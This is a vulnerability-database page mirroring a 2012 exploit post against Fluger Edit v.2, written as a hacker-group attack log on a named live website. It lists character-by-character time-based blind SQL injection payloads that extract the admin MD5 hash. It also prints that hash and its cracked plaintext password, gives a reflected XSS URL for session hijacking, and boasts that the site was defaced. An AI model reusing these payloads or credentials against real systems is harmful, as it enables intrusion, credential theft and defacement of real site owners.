Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Fluger Edit 2 Blind SQL Injection / Cross Site Scripting

🗓️ 02 Sep 2012 00:00:00Reported by AkastepType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 32 Views

Fluger Edit v.2 Blind SQL Injection / Cross Site Scripting, Website: http://www.fluger.com/, Vulnerabilities: Blind SQL Injection And XSS, Exposed CMS and Admin panel, Real Exploitation examples, Vulnerable scenario at http://www.artclima.am/edit/config_secure/verify.php, Time Based RuleZ! www.artclima.am/edit/index.php?error, Example of Bypassing login for

Code
`=====================================================  
Vulnerable Software: Fluger Edit v.2 || administration software  
Vendor: http://www.fluger.com/  
Software License: Commercial  
Vulnerabilities: Blind SQL Injection And XSS  
Tested: In Wild  
=====================================================  
  
  
Dork :  
Designed and developed by Fluger IT  
All right reserved © | 2004 - 2012  
  
************** FOR OUR BRO RAMIL SEFEROV! ************************  
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*  
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=  
********************** REALLY! ********************************************  
******************ENJOY MAXIMALLY**************************************  
  
  
======================================================  
FULLY disclosured Real Exploitation examples:  
GPC MUST BE=OFF  
  
Theris Blind SQLi vulnerability on login page:  
  
http://www.artclima.am/edit/ <===(Admin panel)  
  
  
Vulnerable scenario is exist here: http://www.artclima.am/edit/config_secure/verify.php  
  
(Sorry i have no access to source code)  
  
CMS looks like: http://s61.radikal.ru/i172/1209/29/bb88e6891edf.png  
  
Due authentication mechanism you can't bypass login form by sending:  
'or''='  
  
Instead of you can use Time Based Way to obtain logins:password from admin table.  
Here we go:  
  
Print screens: http://s010.radikal.ru/i314/1209/32/9dae8ab77a3d.png  
  
  
  
  
http://www.artclima.am/edit/index.php?error  
  
  
Headers:  
  
Host: www.artclima.am  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: keep-alive  
Cookie: PHPSESSID=:$  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 28  
  
  
  
POST DATA:  
  
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
  
*REPLAY*  
  
  
loginde Blind varidir.  
Bypass getmir.  
  
Time Based RuleZ!  
  
www.artclima.am/edit/index.php?error  
  
columnlar:  
  
user  
password  
  
  
table: admin  
  
  
  
  
=========================================  
  
1 user var:  
  
//TRUE  
username=' or (select if(count(*)='1',sleep(30),0) from admin)-- and 5='5&password=sikdir  
  
cekek logini  
  
  
login: admin  
  
  
//TRUE  
  
username=' or (select if(user='admin',sleep(30),0) from admin)-- and 5='5&password=sikdir  
  
  
  
parolu cekek:  
  
  
=========================================  
1-ci simvol: e  
  
username=' or (select if(substr(password,1,1)='e',sleep(30),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
2-ci simvol: 0  
  
username=' or (select if(substr(password,2,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
3-cu simvol: 4  
  
username=' or (select if(substr(password,3,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
4-cu simvol: 4  
  
username=' or (select if(substr(password,4,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
5-ci simvol: 6  
  
username=' or (select if(substr(password,5,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
  
=========================================  
6-ci simvol: 5  
  
username=' or (select if(substr(password,6,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
7-ci simvol: 0  
  
username=' or (select if(substr(password,7,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
8-ci simvol: a  
  
username=' or (select if(substr(password,8,1)='a',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
  
=========================================  
9-cu simvol: 5  
  
username=' or (select if(substr(password,9,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
=========================================  
  
10-cu simvol: 6  
  
username=' or (select if(substr(password,10,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
11-ci simvol: 7  
  
username=' or (select if(substr(password,11,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
12-ci simvol: e  
  
username=' or (select if(substr(password,12,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
13-cu simvol: d  
  
username=' or (select if(substr(password,13,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
yoxla sonra  
  
=========================================  
14-cu simvol: 2  
  
username=' or (select if(substr(password,14,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
  
=========================================  
15-ci simvol: b  
  
  
username=' or (select if(substr(password,15,1)='b',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
16-ci simvol: 2  
  
username=' or (select if(substr(password,16,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
  
17-ci simvol: d  
  
username=' or (select if(substr(password,17,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
=========================================  
18-ci simvol: 0  
  
username=' or (select if(substr(password,18,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
19-cu simvol: 4  
  
username=' or (select if(substr(password,19,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
20-ci simvol: 3  
  
username=' or (select if(substr(password,20,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
21-ci simvol: 0  
  
username=' or (select if(substr(password,21,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
  
=========================================  
22-ci simvol: 3  
  
username=' or (select if(substr(password,22,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
=========================================  
  
23-cu simvol: e  
  
username=' or (select if(substr(password,23,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
24-cu simvol: 3  
  
username=' or (select if(substr(password,24,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
25-ci simvol: 7  
  
username=' or (select if(substr(password,25,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
26-ci simvol: 9  
  
username=' or (select if(substr(password,26,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
27-ci simvol: 3  
  
username=' or (select if(substr(password,27,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
28-ci simvol: d  
  
  
username=' or (select if(substr(password,28,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
29-cu simvol: f  
  
username=' or (select if(substr(password,29,1)='f',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
30-cu simvol: d  
  
username=' or (select if(substr(password,30,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
31-ci simvol: 9  
  
username=' or (select if(substr(password,31,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
  
=========================================  
  
32-ci simvol: 5  
  
username=' or (select if(substr(password,32,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
  
Verification: +  
  
  
//TRUE  
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
MD5: e044650a567ed2b2d04303e3793dfd95  
  
Resolves to: price777  
  
Sure! I will "rm"-it too with great pleasure!  
  
Rmned: http://zone-h.org/mirror/id/18295382  
  
  
  
  
  
Second way: Session Hijack to gain access to admin panel:  
  
XSS:  
http://www.artclima.am/edit/admin.php?page=news_admin/news&type=25&type_name=Title%20Ptoduct%3Cscript%3Ealert%28%22OwnEd%20By%20AkaStep%22%29;%3C/script%3E&type_admin=Catalog&empty_sess=1  
  
  
Print Screen:  
http://s61.radikal.ru/i173/1209/26/8f9f482ff32d.png  
  
  
  
  
  
From source code of page:  
  
  
  
  
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="h350">  
<tr valign="top">  
<td class="bg_content">  
<div id="printarea">  
<table cellpadding="0" cellspacing="0" border="0" summary="" style="height: 24px;" width="100%" class="tabfree">  
<tr>  
<td class="tabcurrent">Title Ptoduct<script>alert("OwnEd By AkaStep");</script></td>  
<td>&nbsp;</td>  
</tr>  
</table>  
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="boxborder" >  
  
  
  
==========================THE END=========================  
  
  
  
  
  
  
SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:  
===========================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
to all AA Team + to all Azerbaijan Black HatZ +  
*Especially to my bro CAMOUFL4G3.*  
===========================================================  
  
/AkaStep  
  
  
02.09.2012  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Sep 2012 00:00Current
0.4Low risk
Vulners AI Score0.4
fluger edit v.2blind sql injectioncross site scriptingfluger itcommercial softwarevulnerabilitywebsitecmsadmin panelreal exploitationtime basedbypasslogin form
32